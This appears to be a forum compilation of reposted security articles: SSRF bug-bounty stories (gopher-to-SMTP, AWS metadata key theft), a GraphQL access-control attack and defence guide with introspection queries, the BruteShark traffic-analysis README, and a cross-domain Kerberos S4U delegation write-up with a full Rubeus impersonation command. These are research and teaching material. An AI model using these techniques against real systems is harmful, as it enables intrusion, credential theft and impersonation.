I was able to use the feedback mechanism to perform a local port scan and found a number of services online: SSH, SMTP, DNS, and a few others that I couldn't identify by port. To get to work on proving the impact here, I ended up performing a similar set of tests as I did with DuckDuckGo: I checked redirect and gopher behavior and was lucky enough to find that both were available. Now that I had gopher available, I was able to prove some impact by crafting an SMTP message in gopher and firing it at localhost:25. Sure enough, moments later, a new email showed up in my inbox.

Aftermath

I was awarded $800 and the finding was rated high.

Story 3 — CMSSRF

I was invited to a recently opened private program. If you've never been invited to a program that just opened up, then you may not be aware that you'll get this sense of "blood in the water": you know that all of your fellow hackers and friends who also got an invite are going to start tearing this program up in the next couple of hours, and if you don't want to miss out on any low hanging fruit, you need to be quick. I started my process off by deciding not to look at the core domain but to jump to interesting subdomains. I ran sublist3r and discovered a couple of subdomains that mentioned cms in their domain name. In my experience, CMS services tend to have many problems, so this might be a great place to take a look. I didn't find much on the home page of this asset so I ran dirsearch to see if there was anything potentially interesting hidden on the asset. Sure enough, after about 15 minutes of pounding the asset I found an endpoint that mentioned something about user management that would 302 to another endpoint. That endpoint had a login page for some management system. What's more, there were some javascript files that referenced an API on this asset.
After discovering that the qa subdomain of this asset had unobfuscated javascript, I was able to figure out how to call the API and what calls I had available to me. One of the calls was named createWebRequest and took one url parameter in a POST body. By this point in my hacking I already knew that this asset was running on AWS, so I wasted no time in trying to issue a request to this API endpoint for the AWS metadata IP address. Sure enough, we got a hit.

Response from createWebRequest api

When I tried the AWS keys in the AWS CLI client, I found that I had an absurd level of access to dozens of S3 buckets, dozens more EC2 instances, Redis, etc. It was a critical in every sense of the word.

Aftermath

I was paid $3,000 (max payout) and the report was marked as a critical.

Story 4 — Authenticated Request

This is the story of my most recent SSRF and, in a way, it has been the most entertaining SSRF I've ever found. I started hacking on this new private program I was invited to. I started to look at the core asset for issues. I found a couple of stored XSS at this point and was in a really great mood. I was about to wrap up shop when I took a look at the Burp Collaborator instance that I had left open. What I saw would surprise me.

As an aside: one of the things I do when I'm signing up for services that I'm going to hack on is that I use a Burp Collaborator instance to review email. It's a good way for me to not pollute the email accounts I have with annoying advertisements after I've finished hacking on a service, and it also lets me see if anything interesting is happening after the fact.

Anyway, when I looked at Burp Collaborator, I noticed that it had received an HTTP request with a User-Agent that mentioned the service that I was hacking on. I thought to myself, "Did I just accidentally discover a feature that could be vulnerable to SSRF?!". I set out to figure out how to trigger this again.
Well, putting the timeline of requests together clearly explained what happened. I had just signed up for this service with an email like user@abc123.burpcollaborator.net and seconds later received both an SMTP message (email) and an HTTP request for the homepage. I signed up again with an email address like user@1.2.3.4.xip.io to check if 302 behavior was respected. After receiving the forwarded request in my Burp Collaborator instance, I wanted to confirm that gopher worked, as I had noticed that this request was fronted by Squid Proxy (which would probably block my attempts to access the internal network). Similar to the previous stories, I checked the gopher protocol on a 302 redirect and noted that I was able to use it to interact with internal services. Unfortunately, there was no feedback of any kind, so I wouldn't be able to perform a port scan here. I decided to try for a localhost SMTP message anyway to see if I could get lucky. Sure enough, after crafting a message and performing the attack, I received a new email in my inbox proving that this SSRF was real and dangerous.

Aftermath

Well, unlike the previous stories, I have yet to get paid for this finding. The good news is that my report has been triaged as a high so I'm just waiting for a final determination on the payout. I'll probably post about it on my Twitter (which you should go follow if you haven't yet).

Story 5 — Owning the Clout

I wish I could say that this story was inspired by Nahamsec and Daeken's SSRF talk at Defcon, but I had found this roughly a year prior to their talk being released. I was hacking on a new program for a company in the financial space. It was a product I had never seen (or heard of) before and was heavily involved in analytics. One of the features allowed you to upload images and store them for use in a couple of other features in the product.
Of course, one of the tests that I want to perform here is "Can I upload HTML?" and if so, "What happens if that HTML fetches external resources?" I tried uploading an HTML file but found that the service rejected the upload. I tried to see if I could lie about the content type in the multipart upload by changing it to say image/jpeg and sure enough it uploaded the document fine. After making a request to this other endpoint that gave you updates on the status of the document, it would trigger an internal renderer/browser to issue a request to attacker.com. In this case, I would've done more to prove impact, but it was pretty clear that this was super unintended and I would've been able to access an internal system if I had an address to hit. I ended up reporting and getting a bounty.

Aftermath

I was compensated $1,000 for this finding and it was rated a medium. In retrospect, I should've done more to see if I could prove additional impact. I feel like that would've allowed me to be compensated much more highly than I was.

Wrap Up

SSRF is my favorite bug class due to its simplicity in execution, difficulty in mitigation, and the crazy number of ways that SSRF manifests (I've even heard of methods to use FTP to trigger it). Having the ability to interact with private, internal networks is incredibly fascinating to me and I hope that after reading this post and the stories within, you'll feel more empowered to find and explore the inaccessible networks powering the modern world.

Shout-outs to Alyssa Herrera whose Piercing the Veil post inspired me to even look for and become fascinated with SSRF in the first place.

Thanks to Hon Kwok.

Sursa: https://medium.com/@d0nut/piercing-the-veal-short-stories-to-read-with-friends-4aa86d606fc5
-
Closing the Loop: Practical Attacks and Defences for GraphQL APIs

Eugene Lim · May 6 · 9 min read

Introduction

GraphQL is a modern query language for Application Programming Interfaces (APIs). Supported by Facebook and the GraphQL Foundation, GraphQL grew quickly and has entered the early majority phase of the technology adoption cycle, with major industry players like Shopify, GitHub and Amazon coming on board.

Innovation Adoption Lifecycle from Wikipedia

As with the rise of any new technology, using GraphQL came with growing pains, especially for developers who were implementing GraphQL for the first time. While GraphQL promised greater flexibility and power over traditional REST APIs, GraphQL could potentially increase the attack surface for access control vulnerabilities. Developers should look out for these issues when implementing GraphQL APIs and rely on secure defaults in production. At the same time, security researchers should pay attention to these weak spots when testing GraphQL APIs for vulnerabilities.

With a REST API, clients make HTTP requests to individual endpoints. For example:

GET /api/user/1: Get user 1
POST /api/user: Create a user
PUT /api/user/1: Edit user 1
DELETE /api/user/1: Delete user 1

GraphQL replaces the standard REST API paradigm. Instead, GraphQL specifies only one endpoint to which clients send either query or mutation request types. These perform read and write operations respectively. A third request type, subscriptions, was introduced later but has been used far less often. On the backend, developers define a GraphQL schema that includes object types and fields to represent different resources. For example, a user would be defined as:

```graphql
type User {
  id: ID!
  name: String!
  email: String!
  height(unit: LengthUnit = METER): Float
  friends: [User!]!
  status: Status!
}

enum LengthUnit {
  METER
  FOOT
}

enum Status {
  FREE
  PREMIUM
}
```

This simple example demonstrates several powerful features of GraphQL.
It supports a list of other object types (friends), variables (unit), and enums (status). In addition, developers write resolvers, which define how the backend fetches results from the database for a GraphQL request. To illustrate this, let's assume that a developer has defined the following query in the schema:

```json
{
  "name": "getUser",
  "description": null,
  "args": [
    {
      "name": "id",
      "description": null,
      "type": { "kind": "SCALAR", "name": "ID", "ofType": null },
      "defaultValue": null
    }
  ],
  "type": { "kind": "OBJECT", "name": "User", "ofType": null },
  "isDeprecated": false,
  "deprecationReason": null
}
```

On the client side, a user would make the getUser query and retrieve the name and email fields through the following POST request:

```http
POST /graphql
Host: example.com
Content-Type: application/json

{"query":"query getUser($id:ID!) { getUser(id:$id) { name email }}","variables":{"id":1},"operationName":"getUser"}
```

On the backend, the GraphQL layer would parse the request and pass it to the matching resolver:

```javascript
Query: {
  user(obj, args, context, info) {
    return context.db.loadUserByID(args.id).then(
      userData => new User(userData)
    )
  }
}
```

Here, args refers to the arguments provided to the field in the GraphQL query. In this case, args.id is 1. Finally, the requested data would be returned to the client:

```json
{
  "data": {
    "user": {
      "name": "John Doe",
      "email": "johndoe@example.com"
    }
  }
}
```

You may have noticed that the User object type also includes the friends field, which references other User objects. Clients can use this to query other fields on related User objects.

```http
POST /graphql
Host: example.com
Content-Type: application/json

{"query":"query getUser($id:ID!) { getUser(id:$id) { name email friends { email }}}","variables":{"id":1},"operationName":"getUser"}
```

Thus, instead of manually defining individual API endpoints and controller functions, developers can leverage the flexibility of GraphQL to craft complex queries on the client side without having to modify the backend.
This makes GraphQL popular with serverless implementations like Apollo Server with AWS Lambda.

Trouble in Paradise

Remember the familiar line — with great power comes great responsibility? While GraphQL's flexibility is a strong advantage, it can be abused to exploit access control and information disclosure vulnerabilities. Consider the simple User object type and query. You might reasonably expect that a user can query the email of their friends. But what about the email of their friends' friends? Without seeking authorisation, an attacker could easily obtain the emails of second-degree and third-degree connections using the following:

```graphql
query Users($id: ID!) {
  user(id: $id) {
    name
    friends {
      friends {
        email
        friends {
          email
        }
      }
    }
  }
}
```

In the classic REST paradigm, developers implement access controls for each individual controller or model hook. While potentially violating the Don't Repeat Yourself (DRY) principle, this gives developers greater control over each call's access controls. GraphQL advises developers to delegate authorisation to the business logic layer rather than the GraphQL layer.

Business Logic Layer from GraphQL

As such, the authorisation logic sits below the GraphQL resolver. For instance, in this sample from GraphQL:

```javascript
// Authorization logic lives inside postRepository
var postRepository = require('postRepository');

var postType = new GraphQLObjectType({
  name: 'Post',
  fields: {
    body: {
      type: GraphQLString,
      resolve: (post, args, context, { rootValue }) => {
        return postRepository.getBody(context.user, post);
      }
    }
  }
});
```

postRepository.getBody validates access controls in the business logic layer. However, this isn't enforced by the GraphQL specification. GraphQL recognises that it may be "tempting" for developers to place the authorisation logic incorrectly in the GraphQL layer. Unfortunately, developers fall into this trap far too often, creating holes in the access control layer.
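To make the recommendation concrete, here is a small Python sketch (mine, not from the article) of the same pattern: the resolver stays a thin routing layer and the authorisation check lives in the model, so every path to the data passes through it.

```python
from dataclasses import dataclass
from typing import Optional

@dataclass
class User:
    id: int
    name: str
    email: str

# Toy in-memory data store standing in for the real database.
DB = {1: User(1, "John Doe", "johndoe@example.com")}

class UserModel:
    """Model layer: the only code allowed to touch the data store."""
    def get_email(self, requesting_user_id: int, target_id: int) -> Optional[str]:
        # Authorisation lives here, not in the GraphQL resolver.
        if requesting_user_id != target_id:
            return None  # or raise a Forbidden error
        user = DB.get(target_id)
        return user.email if user else None

def resolve_email(obj_id, context):
    """Thin resolver: routes straight to the model, no auth logic here."""
    return context["user_model"].get_email(context["current_user_id"], obj_id)

ctx = {"user_model": UserModel(), "current_user_id": 1}
assert resolve_email(1, ctx) == "johndoe@example.com"
assert resolve_email(2, ctx) is None  # blocked in the model layer
```

In this structure a nested friends-of-friends path would end up calling the same model method, so it is covered by the same check instead of relying on each resolver to remember it.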
Thinking in Graphs

So how should security researchers approach a GraphQL API? GraphQL recommends that developers "think in graphs" when modelling their data, and researchers should do the same. We can draw parallels to what I call "second-order Insecure Direct Object References (IDORs)" in the classic REST paradigm. For example, in a REST API, while the following API call may be properly protected:

GET /api/user/1

A "second-order" API call may not be adequately protected:

GET /api/user/1/photo/6

The backend logic may have validated that the user requesting user number 1 has read permissions to that user. However, it has failed to check if they should also have access to photo number 6. The same applies to GraphQL calls, except that with a graph schema, the number of possible paths increases exponentially. Take a social media photo for example: what if an attacker queries the users who have liked a photo, and in turn accesses their photos?

```graphql
query Users($id: ID!) {
  user(id: $id) {
    name
    photos {
      image
      likes {
        user {
          photos {
            image
          }
        }
      }
    }
  }
}
```

What about the likes on those photos? The chain continues. In short, a security researcher should seek to "close the loop" in the graph and find paths towards their target object. Dominic Couture from GitLab explains this comprehensively in his post about his graphql-path-enum tool.

Let's Get Down to Business

In most implementations of GraphQL APIs, you should be able to quickly identify the GraphQL endpoint because they tend to be simply /graphql or /graph. You can also identify them based on the requests made to these endpoints.

```http
POST /graphql
Host: example.com
Content-Type: application/json

{"query": "query AllUsers { allUsers{ id } }"}
```

You should look out for keywords like query and mutation. In addition, some GraphQL implementations use GET requests that look like this:

GET /graphql?query=....

Once you've identified the endpoint, you should extract the GraphQL schema.
Thankfully, the GraphQL specification supports such "introspection" queries that return the entire schema. This allows developers to quickly build and debug GraphQL queries. These introspection queries perform a similar function as API documentation tools, such as Swagger, in REST APIs. We can adapt the introspection query from this gist:

```graphql
query IntrospectionQuery {
  __schema {
    queryType { name }
    mutationType { name }
    subscriptionType { name }
    types {
      ...FullType
    }
    directives {
      name
      description
      args {
        ...InputValue
      }
      locations
    }
  }
}

fragment FullType on __Type {
  kind
  name
  description
  fields(includeDeprecated: true) {
    name
    description
    args {
      ...InputValue
    }
    type {
      ...TypeRef
    }
    isDeprecated
    deprecationReason
  }
  inputFields {
    ...InputValue
  }
  interfaces {
    ...TypeRef
  }
  enumValues(includeDeprecated: true) {
    name
    description
    isDeprecated
    deprecationReason
  }
  possibleTypes {
    ...TypeRef
  }
}

fragment InputValue on __InputValue {
  name
  description
  type {
    ...TypeRef
  }
  defaultValue
}

fragment TypeRef on __Type {
  kind
  name
  ofType {
    kind
    name
    ofType {
      kind
      name
      ofType {
        kind
        name
      }
    }
  }
}
```

Of course, you will have to encode this for the method that the call is made with.
To match the standard POST /graphql JSON format, use:

```http
POST /graphql
Host: example.com
Content-Type: application/json

{"query": "query IntrospectionQuery {__schema {queryType { name },mutationType { name },subscriptionType { name },types {...FullType},directives {name,description,args {...InputValue},locations}}}\nfragment FullType on __Type {kind,name,description,fields(includeDeprecated: true) {name,description,args {...InputValue},type {...TypeRef},isDeprecated,deprecationReason},inputFields {...InputValue},interfaces {...TypeRef},enumValues(includeDeprecated: true) {name,description,isDeprecated,deprecationReason},possibleTypes {...TypeRef}}\nfragment InputValue on __InputValue {name,description,type { ...TypeRef },defaultValue}\nfragment TypeRef on __Type {kind,name,ofType {kind,name,ofType {kind,name,ofType {kind,name}}}}"}
```

Hopefully, this will return the entire schema so you can begin hunting for different paths to your desired object type. Several GraphQL frameworks, such as Apollo, acknowledge the dangers of exposing introspection queries and have disabled them in production by default. In such cases, you will have to feel your way forward by patiently brute-forcing and enumerating possible object types and fields. For Apollo, the server helpfully returns Error: Unknown type "X". Did you mean "Y"? for a type or field that's close to the actual value. Security researchers should uncover as much of the original schema as possible. If you have the full schema, feel free to run it through tools like graphql-path-enum to enumerate different paths from one query to a target object type.
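When introspection is disabled, the "Did you mean" behaviour mentioned above can be scripted into a schema-recovery loop. A hedged sketch follows: the endpoint URL is a placeholder, and real Apollo errors may suggest several names in one message, so treat this as a starting point rather than a complete tool.

```python
import json
import re
import urllib.request

# Matches the suggestion inside an Apollo-style error such as:
#   Error: Unknown type "Users". Did you mean "User"?
SUGGESTION = re.compile(r'Did you mean "([^"]+)"')

def extract_suggestions(error_message):
    """Pull suggested type/field names out of an error message."""
    return SUGGESTION.findall(error_message)

def probe(url, guess):
    """Send a query using a guessed field name and harvest suggestions."""
    body = json.dumps({"query": "query { %s { id } }" % guess}).encode()
    req = urllib.request.Request(
        url, data=body, headers={"Content-Type": "application/json"}
    )
    with urllib.request.urlopen(req) as resp:
        payload = json.load(resp)
    names = []
    for err in payload.get("errors", []):
        names.extend(extract_suggestions(err.get("message", "")))
    return names

if __name__ == "__main__":
    # Placeholder target; feed guesses from a wordlist in practice.
    for guess in ("users", "accounts", "posts"):
        print(guess, probe("https://example.com/graphql", guess))
```

Each suggestion goes back into the wordlist, so the server's own error messages gradually reconstruct the hidden schema.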
In the example given by graphql-path-enum, if the target object type in a schema is Skill, the researcher should run:

```
$ graphql-path-enum -i ./schema.json -t Skill
Found 27 ways to reach the "Skill" node from the "Query" node:
- Query (assignable_teams) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
- Query (checklist_check) -> ChecklistCheck (checklist) -> Checklist (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
- Query (checklist_check_response) -> ChecklistCheckResponse (checklist_check) -> ChecklistCheck (checklist) -> Checklist (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
- Query (checklist_checks) -> ChecklistCheck (checklist) -> Checklist (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
- Query (clusters) -> Cluster (weaknesses) -> Weakness (critical_reports) -> TeamMemberGroupConnection (edges) -> TeamMemberGroupEdge (node) -> TeamMemberGroup (team_members) -> TeamMember (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
...
```

The results return different paths in the schema to reach Skill objects through nested queries and linked object types. Security researchers should also go through the schema manually to discover paths that graphql-path-enum might have missed. Since the tool also requires a GraphQL schema to work, researchers that are unable to extract the full schema will also have to rely on manual inspection. To do this, consider the various object types the attacker has access to, find their linked object types, and follow these links to the protected resource. Next, test these queries for access control issues. For mutations, the approach is similar.
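Each enumerated path then has to be turned into an actual query to test. A tiny helper like this (an illustration of the mechanical step, not part of graphql-path-enum) does the conversion:

```python
def path_to_query(path, leaf_fields=("id",)):
    """Turn a list of field names (a path through the graph) into the
    nested GraphQL query that walks it, requesting leaf_fields at the end."""
    inner = " ".join(leaf_fields)
    for field in reversed(path):
        inner = "%s { %s }" % (field, inner)
    return "query { %s }" % inner

# Example: the photo-likes chain from the Thinking in Graphs section.
print(path_to_query(["user", "photos", "likes", "user", "photos"], ("image",)))
# query { user { photos { likes { user { photos { image } } } } } }
```

Feeding each generated query to the endpoint and diffing the results against what the account should legitimately see is then a largely repetitive exercise.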
Beyond testing for direct access control issues (mutations on objects you should not have access to), you will need to check the return values of mutations for linked object types.

Conclusion

GraphQL adds greater flexibility and depth to APIs by querying objects through the graph paradigm. However, it is not a panacea for access control vulnerabilities. GraphQL APIs are prone to the same authorisation and authentication issues that affect REST APIs. Additionally, its access controls still depend on developers to define appropriate business logic or model hooks, increasing the potential for human errors. Developers should move their access controls as close to the persistence (model) layer as possible, and when in doubt, rely on frameworks with sane defaults like Apollo. In particular, Apollo recommends performing authorisation checks in data models:

Since the very beginning, we've recommended moving the actual data fetching and transformation logic from resolvers to centralized Model objects that each represent a concept from your application: User, Post, etc. This allows you to make your resolvers a thin routing layer, and put all of your business logic in one place.

For instance, the model for User would look like this:

```javascript
export const generateUserModel = ({ user }) => ({
  getAll: () => {
    if (!user || !user.roles.includes('admin')) return null;
    return fetch('http://myurl.com/users');
  },
  ...
});
```

By moving the authorisation logic to the model layer instead of spreading it across different controllers, developers can define a single "source of truth". In the long run, as GraphQL enjoys even greater adoption and reaches the late majority stage of the technology adoption cycle, more developers will implement GraphQL for the first time. Developers must carefully consider the attack surface of their GraphQL schemas and implement secure access controls to protect user data.
Further Reading

Introduction to GraphQL
GraphQL path enumeration for better permission testing
GraphQL introspection and introspection queries
Securing GraphQL The Hard Way: Security Learnings from Real-world GraphQL

Special thanks to Dominic Couture, Kenneth Tan, Medha Lim, Serene Chan, and Teck Chung Khor for their inputs.

Sursa: https://medium.com/csg-govtech/closing-the-loop-practical-attacks-and-defences-for-graphql-apis-138cb667aaff
-
Brute Shark

BruteShark is a Network Forensic Analysis Tool (NFAT) that performs deep processing and inspection of network traffic (mainly PCAP files). It includes: extracting passwords, building a network map, reconstructing TCP sessions, extracting hashes of encrypted passwords and even converting them to a Hashcat format in order to perform an offline brute force attack. The main goal of the project is to provide a solution to security researchers and network administrators for the task of network traffic analysis while they try to identify weaknesses that can be used by a potential attacker to gain access to critical points on the network. Two BruteShark versions are available: a GUI-based application (Windows) and a Command Line Interface tool (Windows and Linux). The various projects in the solution can also be used independently as infrastructure for analyzing network traffic on Linux or Windows machines. For further details see the Architecture section. The project was developed in my spare time to address two main passions of mine: software architecture and analyzing network data. Contact me on contact.oded.shimon@gmail.com or create a new issue. Please ⭐️ this repository if this project helped you!

What it can do

Extracting and encoding usernames and passwords (HTTP, FTP, Telnet, IMAP, SMTP...)
Extract authentication hashes and crack them using Hashcat (Kerberos, NTLM, CRAM-MD5, HTTP-Digest...)
Build visual network diagram (Network nodes & users)
Reconstruct all TCP Sessions

Download

Windows - download Windows Installer (64 Bit).
Linux - download BruteSharkCli.zip and run BruteSharkCli.exe using MONO:

wget https://github.com/odedshimon/BruteShark/releases/latest/download/BruteSharkCli.zip
unzip BruteSharkCli.zip
mono BruteSharkCli/BruteSharkCli.exe

Examples Videos

How do I crack (by mistake!)
Windows 10 user NTLM password
Run Brute Shark CLI on Ubuntu with Mono
Hashes Extracting
Building a Network Diagram
Password Extracting
Reconstruct all TCP Sessions
Brute Shark CLI

Architecture

The solution is designed with a three layer architecture, including one or more projects at each layer - DAL, BLL and PL. The separation between layers is created by the fact that each project refers only to its own objects.

PcapProcessor (DAL)

As the Data Access Layer, this project is responsible for reading raw PCAP files using appropriate drivers (WinPcap, libpcap) and their wrapper library SharpPcap. Can analyze a list of files at once, and provides additional features like reconstruction of all TCP Sessions (using the awesome project TcpRecon).

PcapAnalyzer (BLL)

The Business Logic Layer, responsible for analyzing network information (packet, TCP Session etc.), implements a pluggable mechanism. Each plugin is basically a class that implements the interface IModule. All plugins are loaded using reflection:

```csharp
private void _initilyzeModulesList()
{
    // Create an instance for any available modules by looking for every class that
    // implements IModule.
    this._modules = AppDomain.CurrentDomain.GetAssemblies()
        .SelectMany(s => s.GetTypes())
        .Where(p => typeof(IModule).IsAssignableFrom(p) && !p.IsInterface)
        .Select(t => (IModule)Activator.CreateInstance(t))
        .ToList();

    // Register to each module event.
    foreach (var m in _modules)
    {
        m.ParsedItemDetected += (s, e) => this.ParsedItemDetected(s, e);
    }
}
```

BruteSharkDesktop (PL)

Desktop application for Windows based on WinForms. Uses a cross-cutting project in the sense that it references both the DAL and BLL layers. This is done by composing each of the layers, registering to their events, and when an event is triggered, casting the event object to the next layer's equivalent object and sending it to the next layer.

```csharp
public MainForm()
{
    InitializeComponent();
    _files = new HashSet<string>();

    // Create the DAL and BLL objects.
```
```csharp
    // (continuation of the MainForm constructor)
    _processor = new PcapProcessor.Processor();
    _analyzer = new PcapAnalyzer.Analyzer();
    _processor.BuildTcpSessions = true;

    // Create the user controls.
    _networkMapUserControl = new NetworkMapUserControl();
    _networkMapUserControl.Dock = DockStyle.Fill;
    _sessionsExplorerUserControl = new SessionsExplorerUserControl();
    _sessionsExplorerUserControl.Dock = DockStyle.Fill;
    _hashesUserControl = new HashesUserControl();
    _hashesUserControl.Dock = DockStyle.Fill;
    _passwordsUserControl = new GenericTableUserControl();
    _passwordsUserControl.Dock = DockStyle.Fill;

    // Contract the events.
    _processor.TcpPacketArived += (s, e) => _analyzer.Analyze(Casting.CastProcessorTcpPacketToAnalyzerTcpPacket(e.Packet));
    _processor.TcpSessionArived += (s, e) => _analyzer.Analyze(Casting.CastProcessorTcpSessionToAnalyzerTcpSession(e.TcpSession));
    _processor.FileProcessingStarted += (s, e) => SwitchToMainThreadContext(() => OnFileProcessStart(s, e));
    _processor.FileProcessingEnded += (s, e) => SwitchToMainThreadContext(() => OnFileProcessEnd(s, e));
    _processor.ProcessingPrecentsChanged += (s, e) => SwitchToMainThreadContext(() => OnProcessingPrecentsChanged(s, e));
    _analyzer.ParsedItemDetected += (s, e) => SwitchToMainThreadContext(() => OnParsedItemDetected(s, e));
    _processor.TcpSessionArived += (s, e) => SwitchToMainThreadContext(() => OnSessionArived(Casting.CastProcessorTcpSessionToBruteSharkDesktopTcpSession(e.TcpSession)));
    _processor.ProcessingFinished += (s, e) => SwitchToMainThreadContext(() => OnProcessingFinished(s, e));

    InitilizeFilesIconsList();
    this.modulesTreeView.ExpandAll();
}
```

BruteSharkCLI (PL)

Command Line Interface version of Brute Shark. Cross platform: Windows and Linux (with Mono). Available commands:

(1). help
(2). add-file
(3). start
(4). show-passwords
(5). show-hashes
(6). export-hashes
(7). exit

Sursa: https://github.com/odedshimon/BruteShark
-
Crossing Trusts 4 Delegation

Posted on Sat 04 April 2020 in Active Directory

The purpose of this post is to attempt to explain some research I did not long ago on performing S4U across a domain trust. There doesn't seem to be much research in this area and very little information about the process of requesting the necessary tickets. I highly recommend reading Elad Shamir's Wagging the Dog post before reading this, as here I'll primarily focus on the differences between performing S4U within a single domain and performing it across a domain trust, but I won't be going into a huge amount of depth on the basics of S4U and its potential for attack, as Elad has already done that so well.

Motivation

I first thought of the ability to perform cross domain S4U when looking at the following Microsoft advisory. It states:

"To re-enable delegation across trusts and return to the original unsafe configuration until constrained or resource-based delegation can be enabled, set the EnableTGTDelegation flag to Yes."

This makes it clear that it is possible to perform cross domain constrained delegation. The problem was I couldn't find anywhere that gave any real detail as to how it is performed, and the tools used to take advantage of constrained delegation did not support it.
Luckily Will Schroeder published how to simulate real delegation traffic:

```powershell
# translated from the C# example at https://msdn.microsoft.com/en-us/library/ff649317.aspx

# load the necessary assembly
$Null = [Reflection.Assembly]::LoadWithPartialName('System.IdentityModel')

# execute S4U2Self w/ WindowsIdentity to request a forwardable TGS for the specified user
$Ident = New-Object System.Security.Principal.WindowsIdentity @('Administrator@TESTLAB.LOCAL')

# actually impersonate the next context
$Context = $Ident.Impersonate()

# implicitly invoke S4U2Proxy with the specified action
ls \\PRIMARY.TESTLAB.LOCAL\C$

# undo the impersonation context
$Context.Undo()
```

This allowed me to figure out how it works and implement it into Rubeus.

Recap

To perform standard constrained delegation, 3 requests and responses are required:

1. AS-REQ and AS-REP, which is just the standard Kerberos authentication.
2. S4U2Self TGS-REQ and TGS-REP, which is the first step in the S4U process.
3. S4U2Proxy TGS-REQ and TGS-REP, which is the actual impersonation to the target service.

I created a visual representation as the ones I've seen previously weren't the easiest to understand:

In this it's the ticket contained within the final TGS-REP that is used to access the target service as the impersonated user.

Some Theory

After hours of using Will's PowerShell to generate S4U traffic and staring at packet dumps, this is how I understood cross domain S4U to work:

Clearly there's a lot more going on here, so let me try to explain.

The first step is still the same, a standard Kerberos authentication with the local domain controller. (1 and 2)

A service ticket is requested for the foreign domain's krbtgt service from the local domain controller. (3 and 4) The user's real TGT is required for this request. This is known as the inter-realm TGT or cross domain TGT. This resulting service ticket is used to request service tickets for services on the foreign domain from the foreign domain controller.
Here's where things start to get a little complicated. And the S4U2Self starts.

A service ticket for yourself as the target user you want to impersonate is requested from the foreign domain controller. (5 and 6) This requires the cross domain TGT. This is the first step in the cross domain S4U2Self process.

A service ticket for yourself as the user you want to impersonate is now requested from the local domain controller. (7 and 8) This request includes the user's normal TGT as well as having the S4U2Self ticket, received from the foreign domain in step 3, attached as an additional ticket. This is the final step in the cross domain S4U2Self process.

And finally the S4U2Proxy requests. As with S4U2Self, it involves 2 requests: 1 to the local DC and 1 to the foreign DC.

A service ticket for the target service (on the foreign domain) is requested from the local domain controller. (9 and 10) This requires the user's real TGT as well as the S4U2Self ticket, received from the local domain controller in step 4, attached as an additional ticket. This is the first step in the cross domain S4U2Proxy process.

A service ticket for the target service is requested from the foreign domain controller. (11 and 12) This requires the cross domain TGT as well as the S4U2Proxy ticket, received from the local domain controller in step 5, as an additional ticket. This is the service ticket used to access the target service and the final step in the cross domain S4U2Proxy process.

I implemented this full process into Rubeus with this PR, which means that the whole process can be carried out with a single command. The implementation primarily involves the CrossDomainS4U(), CrossDomainKRBTGT(), CrossDomainS4U2Self() and CrossDomainS4U2Proxy() functions, along with the addition of 2 new command line switches, /targetdomain and /targetdc, and some other little modifications.
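To keep the twelve messages straight, the exchange described above can be condensed into a small table. This is just a restatement of the flow in this post as data (not code from Rubeus): each request type, the KDC it goes to, and the tickets it must carry.

```python
# Condensed restatement of the cross-domain S4U exchange:
# (request type, which KDC receives it, tickets the request carries).
STEPS = [
    ("AS-REQ",                 "local DC",   ["client credentials"]),
    ("TGS-REQ krbtgt/FOREIGN", "local DC",   ["local TGT"]),
    ("S4U2Self",               "foreign DC", ["inter-realm TGT"]),
    ("S4U2Self",               "local DC",   ["local TGT", "foreign S4U2Self ticket"]),
    ("S4U2Proxy",              "local DC",   ["local TGT", "local S4U2Self ticket"]),
    ("S4U2Proxy",              "foreign DC", ["inter-realm TGT", "local S4U2Proxy ticket"]),
]

# The ticket in the final S4U2Proxy reply is what gets presented to the
# target service as the impersonated user.
for request, kdc, tickets in STEPS:
    print("%-22s -> %-10s carrying %s" % (request, kdc, ", ".join(tickets)))
```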
Basically, when /targetdomain and /targetdc are passed on the command line, Rubeus executes a cross-domain S4U; otherwise a standard one is performed.

What's The Point?

Good question. This could be a useful attack path in some unusual situations. Let me try to explain one. Consider the following infrastructure setup:

There are 2 domains in a single forest: internal.zeroday.lab (the parent and root of the forest) and child1.internal.zeroday.lab (a child domain). We've compromised a standard user, child.user, on child1.internal.zeroday.lab. This user can also authenticate against the SQL server ISQL1 in internal.zeroday.lab as a low privileged user:

As Elad mentions in the MSSQL section of his blog post, if the SQL server has the WebDAV client installed and running, xp_dirtree can be used to coerce an authentication to port 80. What is important here is that the machine account quota for internal.zeroday.lab is 0:

This means that the standard method of creating a new machine account using the relayed credentials will not work:

The machine account quota for child1.internal.zeroday.lab is still the default 10 though:

So the user child.user can be used to create a machine account within the child1.internal.zeroday.lab domain:

As the machine account belongs to another domain, ntlmrelayx.py is not able to resolve the name to a SID:

For this reason I made a small modification which allows you to manually specify the SID rather than a name. First we need the SID of the newly created machine account:

Now the --sid switch can be used to specify the SID of the machine account to delegate access to:

The configuration can be verified using Get-ADComputer:

Impersonation

So now everything is in place to perform the S4U and impersonate users to access ISQL1.
The NTLM hash of the newly created machine account is the last thing that is required:

The following command can be used to perform the full attack and inject the service ticket for immediate use:

.\Rubeus.exe s4u /user:TestChildSPN$ /rc4:C4B0E1B10C7CE2C4723B4E2407EF81A2 /domain:child1.internal.zeroday.lab /dc:IC1DC1.child1.internal.zeroday.lab /impersonateuser:internal.admin /targetdomain:internal.zeroday.lab /targetdc:IDC1.internal.zeroday.lab /msdsspn:http/ISQL1.internal.zeroday.lab /ptt

This command does a number of things but, simply put, it authenticates as TestChildSPN$ from child1.internal.zeroday.lab against IC1DC1.child1.internal.zeroday.lab and impersonates internal.admin from internal.zeroday.lab to access http/ISQL1.internal.zeroday.lab. Now let's look at this in a bit more detail.

As described previously, the first step is to perform a standard Kerberos authentication and receive the TGT of the account that has been delegated access (TestChildSPN$ in this case):

This TGT is then used to request the cross-domain TGT from IC1DC1.child1.internal.zeroday.lab (the local domain controller):

This is simply a service ticket for krbtgt/internal.zeroday.lab. This cross-domain TGT is then used on the foreign domain in exactly the same manner the user's real TGT is used on the local domain.
